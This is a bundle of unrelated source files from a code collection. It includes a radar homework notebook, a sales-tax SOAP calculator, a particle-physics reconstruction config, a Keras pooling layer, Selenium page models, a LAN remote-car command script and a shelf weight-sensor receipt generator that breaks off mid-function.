\n# \n\n# %% [markdown]\n# # Stull problem 8-A.10\n\n# %% [markdown]\n# Chapter 8-A10. Write a python function to find the beamwidth angle in degrees for a radar pulse\n# for the following sets of\n# [wavelength (cm) , antenna\n# dish diameter (m)]:\n#\n# a. [ 20, 8] b. [20, 10] c. [10, 10] d. [10, 5] e. [10, 3]\n# f. [5, 7] g. [5, 5] h. [5, 2] i. [5, 3] j. [3, 1]\n\n# %% {\"deletable\": false, \"nbgrader\": {\"cell_type\": \"code\", \"checksum\": \"f78f1384818ecfda9aeae223ea83ec88\", \"grade\": false, \"grade_id\": \"cell-76c7d3f2f1ade0a7\", \"locked\": false, \"schema_version\": 2, \"solution\": true}}\nimport numpy as np\nimport pytest\nimport json\n\n\ndef find_beamwidth(the_wavel, dish_size):\n \"\"\"\n find the beamwidth using Stulll eq. 8.13\n \n Parameters\n ----------\n \n the_wavel : wavelength (float)\n units (cm)\n \n dish_size : antenna dish diameter (float)\n units (m)\n \n Returns\n -------\n \n beamwidth : beamwidth angle \n units (degrees)\n \"\"\"\n #\n # Stull eq. 8.13\n #\n # YOUR CODE HERE\n raise NotImplementedError()\n\n\n# %%\n## my test for a10\n\n# %% {\"deletable\": false, \"editable\": false, \"nbgrader\": {\"cell_type\": \"code\", \"checksum\": \"b325d081ec1cf53fcfb189ecd9604c75\", \"grade\": true, \"grade_id\": \"cell-fd6801804d7e081b\", \"locked\": true, \"points\": 4, \"schema_version\": 2, \"solution\": false}}\nthe_wavel = [20, 20, 10, 10, 10, 5, 5, 5, 5, 3] # wavelength (cm)\ndish_size = [8, 10, 10, 5, 3, 7, 5, 2, 3, 1] # dishsize (meters)\ninput_vals = list(zip(the_wavel, dish_size))\nassert len(input_vals) == 10\nbeamwidth = [find_beamwidth(wavel, dish_size) for wavel, dish_size in input_vals]\n#\n# test the beamwidth values\n#\nanswer_file = \"ch8_a10_answer.json\"\nif Path(answer_file).is_file():\n with open(answer_file, \"r\") as f:\n answer = json.load(f)\n np.testing.assert_array_almost_equal(beamwidth, answer, decimal=3)\n\n\n# %% [raw]\n# # Stull problem 8-A.12\n#\n# Write a python function to find the range to a radar target, given the\n# round-trip (return) travel times (µs) of:\n#\n# a. 2 b. 5 c. 10 d. 25 e. 50\n# f. 75 g. 100 h. 150 i. 200 j. 300\n\n# %% {\"deletable\": false, \"nbgrader\": {\"cell_type\": \"code\", \"checksum\": \"219c6f3d2faccba6ef83fbf664329f6e\", \"grade\": false, \"grade_id\": \"cell-8bce491044638790\", \"locked\": false, \"schema_version\": 2, \"solution\": true}}\ndef find_range(delT):\n \"\"\"\n tind the range to radar using Stull eq. 8.16\n \n Parameters\n ----------\n \n delT: float\n the round-trip travel times (units: micro sec)\n \n Returns\n -------\n \n radar_range: float\n range from target to radar (units: km)\n \"\"\"\n\n # YOUR CODE HERE\n raise NotImplementedError()\n\n\n# %% [markdown]\n# ## my test for a12\n\n# %% {\"deletable\": false, \"editable\": false, \"nbgrader\": {\"cell_type\": \"code\", \"checksum\": \"f6408a71822220e4a6bfdb7ca4bb31c4\", \"grade\": true, \"grade_id\": \"cell-1fcb43fed3abde1d\", \"locked\": true, \"points\": 4, \"schema_version\": 2, \"solution\": false}}\nimport json\n\ntimes = [2, 5, 10, 25, 50, 75, 100, 150, 200, 300] # microseconds\nthe_range = [find_range(delT) for delT in times]\nassert len(times) == 10\nanswer_file = \"ch8_a12_answer.json\"\nif Path(answer_file).is_file():\n with open(answer_file, \"r\") as f:\n answer = json.load(f)\n np.testing.assert_array_almost_equal(the_range, answer, decimal=1)\n\n# %%\n","sub_path":"notebooks/python/stull_problems_a10_a12.py","file_name":"stull_problems_a10_a12.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"358767657","text":"import os\nfrom config import config\nfrom logger import get_logger\nfrom db import connect_to_db, close_connection\nfrom .process_song_file import process_song_file\nfrom .process_log_file import process_log_file\n\n\n# Config\nDATA_SONG = config['DATA']['DATA_SONG']\nDATA_LOG = config['DATA']['DATA_LOG']\n\n\n# Setup logger\nlogger = get_logger('PROCESS-DATA')\n\n\ndef process_data(path, func):\n logger.info(f\"Start processing '{path}' data\")\n\n files = [os.path.join(dirpath, filename) for (dirpath, dirnames, filenames) in os.walk(path) for filename in filenames if filenames]\n file_amount = len(files)\n\n logger.info(f\"'{file_amount}' files found in '{path}'\")\n\n conn = connect_to_db()\n\n for i, file in enumerate(files, 1):\n func(conn, file)\n \n logger.info(f'{i}/{file_amount} files processed.')\n\n close_connection(conn)\n logger.info(f\"Finish processing '{path}' data\")\n\n\ndef etl():\n process_data(DATA_SONG, process_song_file)\n process_data(DATA_LOG, process_log_file)\n ","sub_path":"etl/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"285298055","text":"from datetime import datetime\nfrom decimal import Decimal\nfrom . import exceptions, settings\nimport logging\nimport soap\n\nlogger = logging.getLogger(__name__)\n\nPOSTCODE_LEN = 5\nPLUS4_LEN = 4\n\n\nclass CCHTaxCalculator(object):\n \"\"\"\n Simple interface between Python and the CCH Sales Tax Office SOAP API.\n \"\"\"\n\n precision = settings.CCH_PRECISION\n wsdl = settings.CCH_WSDL\n entity_id = settings.CCH_ENTITY\n divsion_id = settings.CCH_DIVISION\n max_retries = settings.CCH_MAX_RETRIES\n\n def __init__(self, breaker=None):\n \"\"\"\n Construct a CCHTaxCalculator instance\n\n You may optionally supply a ``pybreaker.CircuitBreaker`` instance. If you do so, it will be used to\n implement the CircuitBreaker pattern around the SOAP calls to the CCH web service.\n\n :param breaker: Optional :class:`CircuitBreaker ` instance\n \"\"\"\n self.breaker = breaker\n\n def apply_taxes(self, shipping_address, basket=None, shipping_charge=None):\n \"\"\"\n Apply taxes to a Basket instance using the given shipping address.\n\n Pass return value of this method to :func:`OrderTaxation.save_details `\n to persist the taxation details, CCH transaction ID, etc in the database.\n\n :param shipping_address: :class:`ShippingAddress ` instance\n :param basket: :class:`Basket ` instance\n :param shipping_charge: :class:`ShippingCharge ` instance\n :return: SOAP Response.\n \"\"\"\n response = self._get_response(shipping_address, basket, shipping_charge)\n\n # Check the response for errors\n respOK = self._check_response_messages(response)\n if not respOK:\n response = None\n\n # Build map of line IDs to line tax details\n cch_line_map = {}\n if response and response.LineItemTaxes:\n cch_line_map = {\n item.ID: item for item in response.LineItemTaxes.LineItemTax\n }\n\n # Apply taxes to line items\n if basket is not None:\n for line in basket.all_lines():\n line_id = str(line.id)\n taxes = cch_line_map.get(line_id)\n self._apply_taxes_to_price(\n taxes, line.purchase_info.price, line.quantity\n )\n\n # Apply taxes to shipping charge\n if shipping_charge is not None:\n for shipping_charge_component in shipping_charge.components:\n shipping_taxes = cch_line_map.get(shipping_charge_component.cch_line_id)\n self._apply_taxes_to_price(shipping_taxes, shipping_charge_component, 1)\n\n # Return CCH response\n return response\n\n def _apply_taxes_to_price(self, taxes, price, quantity):\n # Taxes come in two forms: quantity and percentage based\n # We need to handle both of those here. The tricky part is that CCH returns data\n # for an entire line item (inclusive quantity), but Oscar needs the tax info for\n # each unit in the line (exclusive quantity). So, we use the details provided to\n # derive the per-unit taxes before applying them.\n price.clear_taxes()\n if taxes:\n for tax in taxes.TaxDetails.TaxDetail:\n unit_fee = Decimal(str(tax.FeeApplied)) / quantity\n unit_tax = Decimal(str(tax.TaxApplied)) / quantity\n price.add_tax(\n authority_name=tax.AuthorityName,\n tax_name=tax.TaxName,\n tax_applied=unit_tax,\n fee_applied=unit_fee,\n )\n # Check our work and make sure the total we arrived at matches the total CCH gave us\n total_line_tax = (price.tax * quantity).quantize(self.precision)\n total_applied_tax = Decimal(taxes.TotalTaxApplied).quantize(self.precision)\n if total_applied_tax != total_line_tax:\n raise RuntimeError(\n (\n \"Taxation miscalculation occurred! \"\n \"Details sum to %s, which doesn't match given sum of %s\"\n )\n % (total_line_tax, taxes.TotalTaxApplied)\n )\n else:\n price.tax = Decimal(\"0.00\")\n\n def _get_response(self, shipping_address, basket, shipping_charge):\n \"\"\"Fetch CCH tax data for the given basket and shipping address\"\"\"\n response = None\n retry_count = 0\n while response is None and retry_count <= self.max_retries:\n response = self._get_response_inner(\n shipping_address, basket, shipping_charge, retry_count=retry_count\n )\n retry_count += 1\n return response\n\n def _get_response_inner(\n self, shipping_address, basket, shipping_charge, retry_count\n ):\n response = None\n\n def _call_service():\n order = self._build_order(shipping_address, basket, shipping_charge)\n if order is None:\n return None\n response = self.client.service.CalculateRequest(\n self.entity_id, self.divsion_id, order\n )\n return response\n\n try:\n if self.breaker is not None:\n response = self.breaker.call(_call_service)\n else:\n response = _call_service()\n except Exception as e:\n logger.exception(e)\n return response\n\n def _check_response_messages(self, response):\n \"\"\"Raise an exception if response messages contains any reported errors.\"\"\"\n if response is None:\n return False\n if response.Messages:\n for message in response.Messages.Message:\n if message.Code > 0:\n exc = exceptions.build(message.Severity, message.Code, message.Info)\n logger.exception(exc)\n return False\n return True\n\n @property\n def client(self):\n \"\"\"Lazy constructor for SOAP client\"\"\"\n return soap.get_client(self.wsdl, \"CCH\")\n\n def _build_order(self, shipping_address, basket, shipping_charge):\n \"\"\"Convert an Oscar Basket and ShippingAddresss into a CCH Order object\"\"\"\n order = self.client.factory.create(\"ns15:Order\")\n order.InvoiceDate = datetime.now(settings.CCH_TIME_ZONE)\n order.SourceSystem = settings.CCH_SOURCE_SYSTEM\n order.TestTransaction = settings.CCH_TEST_TRANSACTIONS\n order.TransactionType = settings.CCH_TRANSACTION_TYPE\n order.CustomerType = settings.CCH_CUSTOMER_TYPE\n order.ProviderType = settings.CCH_PROVIDER_TYPE\n order.TransactionID = 0\n order.finalize = settings.CCH_FINALIZE_TRANSACTION\n\n # Add CCH lines for each basket line\n if basket is not None:\n for line in basket.all_lines():\n qty = getattr(line, \"cch_quantity\", line.quantity)\n if qty <= 0:\n continue\n # Line Info\n item = self.client.factory.create(\"ns11:LineItem\")\n item.ID = line.id\n item.AvgUnitPrice = Decimal(\n line.line_price_excl_tax_incl_discounts / qty\n ).quantize(Decimal(\"0.00001\"))\n item.Quantity = qty\n item.ExemptionCode = None\n item.SKU = self._get_product_data(\"sku\", line)\n # Product Info\n item.ProductInfo = self.client.factory.create(\"ns21:ProductInfo\")\n item.ProductInfo.ProductGroup = self._get_product_data(\"group\", line)\n item.ProductInfo.ProductItem = self._get_product_data(\"item\", line)\n # Ship From/To Addresses\n item.NexusInfo = self.client.factory.create(\"ns14:NexusInfo\")\n warehouse = line.stockrecord.partner.primary_address\n if warehouse:\n item.NexusInfo.ShipFromAddress = self._build_address(warehouse)\n item.NexusInfo.ShipToAddress = self._build_address(shipping_address)\n # Add line to order\n order.LineItems.LineItem.append(item)\n\n # Add CCH lines for shipping charges\n if shipping_charge is not None and settings.CCH_SHIPPING_TAXES_ENABLED:\n for shipping_charge_component in shipping_charge.components:\n shipping_line = self.client.factory.create(\"ns11:LineItem\")\n shipping_line.ID = shipping_charge_component.cch_line_id\n shipping_line.AvgUnitPrice = (\n shipping_charge_component.excl_tax.quantize(Decimal(\"0.00001\"))\n )\n shipping_line.Quantity = 1\n shipping_line.ExemptionCode = None\n shipping_line.SKU = shipping_charge_component.cch_sku\n shipping_line.NexusInfo = self.client.factory.create(\"ns14:NexusInfo\")\n shipping_line.NexusInfo.ShipToAddress = self._build_address(\n shipping_address\n )\n # Add shipping line to order\n order.LineItems.LineItem.append(shipping_line)\n\n # Must include at least 1 line item\n if len(order.LineItems.LineItem) <= 0:\n return None\n\n # Return order\n return order\n\n def _build_address(self, oscar_address):\n addr = self.client.factory.create(\"ns0:Address\")\n addr.Line1 = oscar_address.line1\n addr.Line2 = oscar_address.line2\n addr.City = oscar_address.city\n addr.StateOrProvince = oscar_address.state\n postcode, plus4 = self.format_postcode(oscar_address.postcode)\n addr.PostalCode = postcode\n addr.Plus4 = plus4\n addr.CountryCode = oscar_address.country.code\n return addr\n\n def _get_product_data(self, key, line):\n key = \"cch_product_%s\" % key\n sku = getattr(settings, key.upper())\n sku = getattr(line.product.attr, key.lower(), sku)\n return sku\n\n def format_postcode(self, raw_postcode):\n if not raw_postcode:\n return \"\", \"\"\n postcode, plus4 = raw_postcode[:POSTCODE_LEN], None\n # Set Plus4 if PostalCode provided as 9 digits separated by hyphen\n if len(raw_postcode) == POSTCODE_LEN + PLUS4_LEN + 1:\n plus4 = raw_postcode[POSTCODE_LEN + 1 :]\n return postcode, plus4\n","sub_path":"src/oscarcch/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":10545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"312172597","text":"#!/usr/bin/env python\n\nfrom Gaudi.Configuration import *\nfrom Configurables import K4DataSvc\ndsvc = K4DataSvc(\"EventDataSvc\")\n\n# read LCIO files\nfrom Configurables import LCIOInput\nread = LCIOInput(\"read\")\nread.inputs = [\n#\"/cefs/data/FullSim/CEPC240/CEPC_v4/higgs/smart_final_states/E240.Pffh_invi.e0.p0.whizard195//ffh_inv.e0.p0.00001_1000_sim.slcio\"\n#\"/junofs/users/wxfang/CEPC/CEPCOFF/doReco/reco_output/nnh_aa.e0.p0.00010_000000_rec.slcio\"\n\"/cefs/higgs/wxfang/cepc/Pandora/CaloDigi/gamma/Digi_sim_0.slcio\"\n]\nread.collections = {\n #\"COILCollection\" : \"SimTrackerHit\",\n #\"EcalBarrelSiliconCollection\" : \"SimCalorimeterHit\",\n \"MCParticle\" : \"MCParticle\",\n \"ECALBarrel\" : \"CalorimeterHit\",\n \"ECALEndcap\" : \"CalorimeterHit\",\n \"ECALOther\" : \"CalorimeterHit\",\n \"HCALBarrel\" : \"CalorimeterHit\",\n \"HCALEndcap\" : \"CalorimeterHit\",\n \"HCALOther\" : \"CalorimeterHit\",\n \"MUON\" : \"CalorimeterHit\",\n \"LCAL\" : \"CalorimeterHit\",\n \"LHCAL\" : \"CalorimeterHit\",\n \"BCAL\" : \"CalorimeterHit\",\n #\"MarlinTrkTracks\" : \"Track\"\n #\"TPCCollection\" : \"SimTrackerHit\",\n #\"VXDCollection\" : \"SimTrackerHit\"\n}\n##############################################################################\nfrom Configurables import GearSvc\ngearSvc = GearSvc(\"GearSvc\")\ngearSvc.GearXMLFile = \"/junofs/users/wxfang/CEPC/CEPCOFF/doSim/fullDet/GearOutput.xml\"\n##############################################################################\nfrom Configurables import PandoraPFAlg\n\npandoralg = PandoraPFAlg(\"PandoraPFAlg\")\n## KEEP same with lcioinput name for the ReadXXX ###########\npandoralg.ReadMCParticle = \"MCParticle\" \npandoralg.ReadECALBarrel = \"ECALBarrel\" \npandoralg.ReadECALEndcap = \"ECALEndcap\" \npandoralg.ReadECALOther = \"ECALOther\" \npandoralg.ReadHCALBarrel = \"HCALBarrel\" \npandoralg.ReadHCALEndcap = \"HCALEndcap\" \npandoralg.ReadHCALOther = \"HCALOther\" \npandoralg.ReadMUON = \"MUON\" \npandoralg.ReadLCAL = \"LCAL\" \npandoralg.ReadLHCAL = \"LHCAL\" \npandoralg.ReadBCAL = \"BCAL\" \npandoralg.ReadKinkVertices = \"KinkVertices\" \npandoralg.ReadProngVertices = \"ProngVertices\" \npandoralg.ReadSplitVertices = \"SplitVertices\" \npandoralg.ReadV0Vertices = \"V0Vertices\" \npandoralg.ReadTracks = \"MarlinTrkTracks\" \npandoralg.WriteClusterCollection = \"PandoraClusters\" \npandoralg.WriteReconstructedParticleCollection = \"PandoraPFOs\" \npandoralg.WriteVertexCollection = \"PandoraPFANewStartVertices\" \npandoralg.AnaOutput = \"/cefs/higgs/wxfang/cepc/Pandora/Ana/gamma/Ana_gamma_test.root\"\n\npandoralg.PandoraSettingsDefault_xml = \"/junofs/users/wxfang/MyGit/MarlinPandora/scripts/PandoraSettingsDefault_wx.xml\"\n#### Do not chage the collection name, only add or delete ###############\npandoralg.TrackCollections = [\"MarlinTrkTracks\"]\npandoralg.ECalCaloHitCollections= [\"ECALBarrel\", \"ECALEndcap\", \"ECALOther\"]\npandoralg.HCalCaloHitCollections= [\"HCALBarrel\", \"HCALEndcap\", \"HCALOther\"]\npandoralg.LCalCaloHitCollections= [\"LCAL\"]\npandoralg.LHCalCaloHitCollections= [\"LHCAL\"]\npandoralg.MuonCaloHitCollections= [\"MUON\"]\npandoralg.MCParticleCollections = [\"MCParticle\"]\npandoralg.RelCaloHitCollections = [\"RecoCaloAssociation_ECALBarrel\", \"RecoCaloAssociation_ECALEndcap\", \"RecoCaloAssociation_ECALOther\", \"RecoCaloAssociation_HCALBarrel\", \"RecoCaloAssociation_HCALEndcap\", \"RecoCaloAssociation_HCALOther\", \"RecoCaloAssociation_LCAL\", \"RecoCaloAssociation_LHCAL\", \"RecoCaloAssociation_MUON\"]\npandoralg.RelTrackCollections = [\"MarlinTrkTracksMCTruthLink\"]\npandoralg.KinkVertexCollections = [\"KinkVertices\"]\npandoralg.ProngVertexCollections= [\"ProngVertices\"]\npandoralg.SplitVertexCollections= [\"SplitVertices\"]\npandoralg.V0VertexCollections = [\"V0Vertices\"]\npandoralg.ECalToMipCalibration = 160.0 \npandoralg.HCalToMipCalibration = 34.8 \npandoralg.ECalMipThreshold = 0.5 \npandoralg.HCalMipThreshold = 0.3 \npandoralg.ECalToEMGeVCalibration= 0.9 #for G2CD Digi, 1.007 for NewLDCaloDigi \npandoralg.HCalToEMGeVCalibration= 1.007 \npandoralg.ECalToHadGeVCalibrationBarrel= 1.12 #very small effect \npandoralg.ECalToHadGeVCalibrationEndCap= 1.12 \npandoralg.HCalToHadGeVCalibration= 1.07\npandoralg.MuonToMipCalibration= 10.0 \npandoralg.DigitalMuonHits= 0 \npandoralg.MaxHCalHitHadronicEnergy = 1.0 \npandoralg.UseOldTrackStateCalculation= 0 \npandoralg.AbsorberRadLengthECal= 0.2854 \npandoralg.AbsorberIntLengthECal= 0.0101 \npandoralg.AbsorberRadLengthHCal= 0.0569 \npandoralg.AbsorberIntLengthHCal= 0.006 \npandoralg.AbsorberRadLengthOther= 0.0569\npandoralg.AbsorberIntLengthOther= 0.006 \n\n##############################################################################\n\n# write PODIO file\nfrom Configurables import PodioOutput\nwrite = PodioOutput(\"write\")\nwrite.filename = \"test.root\"\nwrite.outputCommands = [\"keep *\"]\n\n# ApplicationMgr\nfrom Configurables import ApplicationMgr\nApplicationMgr(\n #TopAlg = [read, pandoralg, write],\n TopAlg = [read, pandoralg],\n EvtSel = 'NONE',\n EvtMax = 10,\n ExtSvc = [dsvc, gearSvc],\n OutputLevel=INFO\n)\n","sub_path":"Examples/options/LCIO_read_pan.py","file_name":"LCIO_read_pan.py","file_ext":"py","file_size_in_byte":5802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"352035126","text":"import tensorflow as tf\nimport keras as K\n\n\nclass GlobalExpectationPooling1D(K.layers.Layer):\n \"\"\"Global Expect pooling operation for temporal data.\n # Arguments\n data_format: A string,\n one of `channels_last` (default) or `channels_first`.\n The ordering of the dimensions in the inputs.\n `channels_last` corresponds to inputs with shape\n `(batch, steps, features)` while `channels_first`\n corresponds to inputs with shape\n `(batch, features, steps)`.\n mode: int\n m_trainable: A boolean variable,\n if m_trainable == True, the base will be trainable,\n else the base will be a constant\n m_value: A integer,\n the value of the base to calculate the prob\n # Input shape\n `(batch_size, steps, features,)`\n # Output shape\n 2D tensor with shape:\n `(batch_size, features)`\n \"\"\"\n\n def __init__(self, mode=0, m_trainable=False, m_value=1, **kwargs):\n super(GlobalExpectationPooling1D, self).__init__(**kwargs)\n self.m_value = m_value\n self.mode = mode\n self.m_trainable = m_trainable\n\n def compute_output_shape(self, input_shape):\n return input_shape[0], input_shape[2]\n\n def call(self, x, **kwargs):\n if self.mode == 0:\n # transform the input\n now = tf.transpose(x, [0, 2, 1])\n # x = x - max(x)\n diff_1 = tf.subtract(now, tf.reduce_max(now, axis=-1, keep_dims=True))\n # x = mx\n diff = tf.multiply(diff_1, self.m)\n # prob = exp(x_i)/sum(exp(x_j))\n prob = tf.nn.softmax(diff)\n # Expectation = sum(Prob*x)\n expectation = tf.reduce_sum(tf.multiply(now, prob), axis=-1, keep_dims=False)\n else:\n # transform the input\n now = tf.transpose(x, [0, 2, 1])\n # x - mean(x)\n now_diff = tf.subtract(now, tf.reduce_mean(now, axis=-1, keep_dims=True))\n # x = mx\n now_diff_m = tf.multiply(now_diff, self.m)\n # sgn(x)\n sgn_now = tf.sign(now_diff_m)\n # exp(x - mean) * sgn(x - mean(x)) + exp(x - mean(x))\n diff_2 = tf.add(tf.multiply(sgn_now, tf.exp(now_diff_m)), tf.exp(now_diff_m))\n # x = x/2\n diff_now = tf.div(diff_2, 2)\n # Prob = exp(x) / sum(exp(x))\n prob = diff_now / tf.reduce_sum(diff_now, axis=-1, keep_dims=True)\n expectation = tf.reduce_sum(tf.multiply(now, prob), axis=-1, keep_dims=False)\n return expectation\n\n def get_config(self):\n base_config = super(GlobalExpectationPooling1D, self).get_config()\n return dict(list(base_config.items()))\n\n def build(self, input_shape):\n if self.m_trainable:\n self.m = self.add_weight(name='m',\n shape=(1, 1),\n initializer=K.initializers.Constant(value=self.m_value),\n trainable=True)\n else:\n self.m = self.add_weight(name='m',\n shape=(1, 1),\n initializer=K.initializers.Constant(value=self.m_value),\n trainable=False)\n super(GlobalExpectationPooling1D, self).build(input_shape)\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"code/model/ePooling.py","file_name":"ePooling.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"258758335","text":"import sys\nimport socket\nimport time\n\nsocketCar = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsocketCar.connect((\"192.168.0.101\", 9000))\nprint(\"connected\")\n\ncmd=\"U\"\ni=0\nwhile True:\n try:\n i+=1\n print(i, cmd)\n socketCar.send((cmd+\"\\n\").encode())\n time.sleep(.05)\n # if i > 100: break\n except KeyboardInterrupt:\n break\nsocketCar.close()\n","sub_path":"src/main/python/send_cmds.py","file_name":"send_cmds.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"466982791","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\nfrom .WebDriverContainer import WebDriverContainer\n\n\nclass HomePageModel(WebDriverContainer):\n __page_container_selector = (By.CLASS_NAME, \"navigation\")\n __link_selector = (By.CSS_SELECTOR, \"li.level0.ui-menu-item > a\")\n\n def __init__(self, driver):\n super().__init__(driver)\n\n @property\n def section_links(self):\n page_container = self.try_find_element(\n self.__page_container_selector, 20)\n\n links = self.try_find_elements_of(\n page_container, self.__link_selector, 20)\n\n return links\n\n\nclass HomePage(WebDriverContainer):\n def __init__(self, driver):\n super().__init__(driver)\n self.__page__ = HomePageModel(driver)\n\n @property\n def section_links(self):\n \"\"\"will return link web elements of sections.\"\"\"\n return self.__page__.section_links\n","sub_path":"src/models/HomePage.py","file_name":"HomePage.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"295936955","text":"from ..object import Trait\n\ndef Parameter(name, attribute=None, type=object, required=False, default=None):\n\n class Parameter(Trait):\n\n def __init__(self, *args, **kwargs):\n param = kwargs.get(name)\n classname = __builtins__['type'](self).__name__\n\n try:\n _type = tuple(type)\n except TypeError:\n _type = (type, )\n\n if param is None and required:\n raise ValueError(\"Parameter {} is required to instantiate {}\".format(name, classname))\n elif param is None:\n setattr(self, attribute or name, default or param)\n else:\n if not isinstance(param, _type):\n param_type = __builtins__['type'](param).__name__\n ok_params = \" or \".join(t.__name__ for t in _type)\n raise TypeError(\"Parameter {} must be of type {},\"\n \" not {}\".format(name, ok_params, param_type))\n setattr(self, attribute or name, param)\n\n Parameter.__qualname__ = Parameter.__name__\n return Parameter\n","sub_path":"abstraits/trait/parameter.py","file_name":"parameter.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"479681348","text":"import queue\nimport numpy as np\nimport time\nfrom collections import defaultdict\nimport json\n#from cvs_data_read import csv_file_read as cfr\n#from cvs_data_read import ground_truth_read as gtr\n\nfrom weight_sensor import WeightSensor\nfrom weight_sensor import weight_based_item_estimate\n\nimport sys\nimport logging\n\nfrom clients import (\n CpsMongoClient,\n CpsApiClient,\n TestCaseClient,\n)\nfrom cli import parse_configs\nfrom log import setup_logger\n\n\nlogger = logging.getLogger(__name__) # pylint: disable=invalid-name\n\n\ndef main(args=None):\n args = parse_configs(args)\n setup_logger(args.log_level)\n mongo_client = CpsMongoClient(args.db_address)\n api_client = CpsApiClient()\n test_client = TestCaseClient(mongo_client, api_client)\n #test_client.load(f\"{args.command}-{args.sample}\")\n logger.info(f\"Available Test Cases are {test_client.available_test_cases}\")\n test_client.set_context(args.command, load=False)\n generate_receipts(test_client)\n\ndef load_product_locations(test_client,Weight_sensor_number):\n productList = test_client.list_products()\n out_sensor_product_info = []\n weight_sensor_info = [[] for jj in range(Weight_sensor_number)]\n for aProduct in productList:\n item_info = [(aProduct.product_id.barcode, aProduct.name), aProduct.weight, aProduct.price]\n allFacings = test_client.find_product_facings(aProduct.product_id)\n if len(allFacings) == 0:\n out_sensor_product_info.append(item_info)\n continue\n for aFacing in allFacings:\n for plateLoc in aFacing.plate_ids:\n sensor_number = (plateLoc.gondola_id - 1) * 6 * 12 + (plateLoc.shelf_index- 1) * 12 + plateLoc.plate_index -1\n weight_sensor_info[sensor_number].append(item_info)\n return weight_sensor_info, out_sensor_product_info\n\ndef get_sensor_batch(test_client, start_time, batch_length, Weight_sensor_number):\n if start_time <= 0:\n # the first time, we don't know when the timestamps start, so let's find out\n first_data = test_client.find_first_after_time(\"plate_data\",0.0)[0]\n start_time = first_data.timestamp\n\n batch_data = test_client.find_all_between_time(\"plate_data\", start_time, start_time+batch_length)\n if len(batch_data) == 0:\n return None, -1\n weight_update_data = [np.empty((0,2)) for jj in range(Weight_sensor_number)]\n currentTime = start_time\n for rawData in batch_data:\n currentTime = rawData.timestamp\n startShelf = rawData.plate_id.shelf_index\n startPlate = rawData.plate_id.plate_index\n gondolaId = rawData.plate_id.gondola_id\n dataSize = rawData.data.shape\n nSamples = dataSize[0]\n nShelves = dataSize[1]\n nPlates = dataSize[2]\n ts = np.array(range(nSamples))*(1.0/60) + currentTime # the timestamps in this packet\n ts = ts.reshape((nSamples,1))\n for jj in range(nShelves):\n for kk in range(nPlates):\n weightData = (rawData.data[:,jj,kk]).reshape(nSamples,1)\n if not(np.isnan(weightData).all()):\n sensor_number = (gondolaId - 1) * 6 * 12 + (startShelf+jj- 1) * 12 + startShelf + kk -1\n updateData = np.hstack((ts,weightData))\n prevData = weight_update_data[sensor_number]\n \n weight_update_data[sensor_number] = np.vstack((prevData, updateData))\n\n return weight_update_data, currentTime \n \ndef generate_receipts(test_client):\n Weight_sensor_number = 360\n \n detected_weight_event_queue = [queue.Queue(0) for kk in\n range(Weight_sensor_number)] # event sotor queue of each sensor\n total_detected_queue = queue.Queue(0) # number changed_weight timestamp #total queue of detected event\n merged_detected_queue = queue.Queue(0)\n\n #ground truth data read\n sensor_info, out_info = load_product_locations(test_client, Weight_sensor_number)\n\n\n weight_sensor_list = [WeightSensor(jj, {'1':[10,10,2]}, np.array([]), np.array([])) for jj in range(Weight_sensor_number)]\n \n receipts = defaultdict(list)\n buffer_info = []\n pre_timestamp = 0\n pre_system_time = time.time()\n moreData, next_time = get_sensor_batch(test_client, -1, 1.0, Weight_sensor_number)\n while moreData is not None:\n for sensor_number in range(Weight_sensor_number):\n update_data = moreData[sensor_number]\n if update_data.shape[0] == 0:\n continue # no data loaded from the batch\n update_wv = update_data[:,1]\n update_ts = update_data[:,0]\n weight_sensor_list[sensor_number].value_update(total_detected_queue, detected_weight_event_queue, update_wv, update_ts)\n #time.sleep(0.1)\n\n logger.debug(\"Detected {} events\".format(total_detected_queue.qsize()))\n\n while not total_detected_queue.empty():\n tmp_info = total_detected_queue.get()\n tmp_timestamp = tmp_info[2]\n \n new_event = False\n if abs(pre_timestamp - tmp_timestamp) > 2:\n new_event = True\n if new_event:\n if len(buffer_info) > 0:\n merged_detected_queue.put(buffer_info)\n buffer_info = []\n if len(buffer_info) < 1:\n pre_system_time = time.time()\n buffer_info.append(tmp_info)\n pre_timestamp = tmp_timestamp\n #total_detected_queue.task_done()\n \n now_time = time.time()\n \n if now_time - pre_system_time > 1:\n if len(buffer_info)>0:\n #print(now_time - pre_system_time)\n merged_detected_queue.put(buffer_info)\n buffer_info = []\n pre_system_time = time.time()\n \n while not merged_detected_queue.empty():\n detected_event = merged_detected_queue.get()\n\n logger.debug(detected_event)\n sensor_number_list =[]\n total_changed_weight = 0\n event_timestamp =0\n for kk in range(len(detected_event)):\n sub_event = detected_event[kk]\n sensor_number_list.append(sub_event[0])\n total_changed_weight = total_changed_weight + sub_event[1]\n event_timestamp = sub_event[2]\n \n item_fin_name, item_fin_number, item_fin_price = weight_based_item_estimate(sensor_number_list, total_changed_weight, sensor_info, out_info)\n weight_based_item_info =[event_timestamp, item_fin_name, item_fin_number, item_fin_price]\n logger.debug(weight_based_item_info)\n # who is in the store?\n try:\n target_list = test_client.find_first_after_time(\"full_targets\", event_timestamp)\n except KeyError:\n logger.error(\"Could not load targets at time={}\".format(event_timestamp))\n else:\n if target_list is None:\n logger.error(\"No targets in database\")\n elif len(target_list) > 0:\n target_list = target_list[0]\n 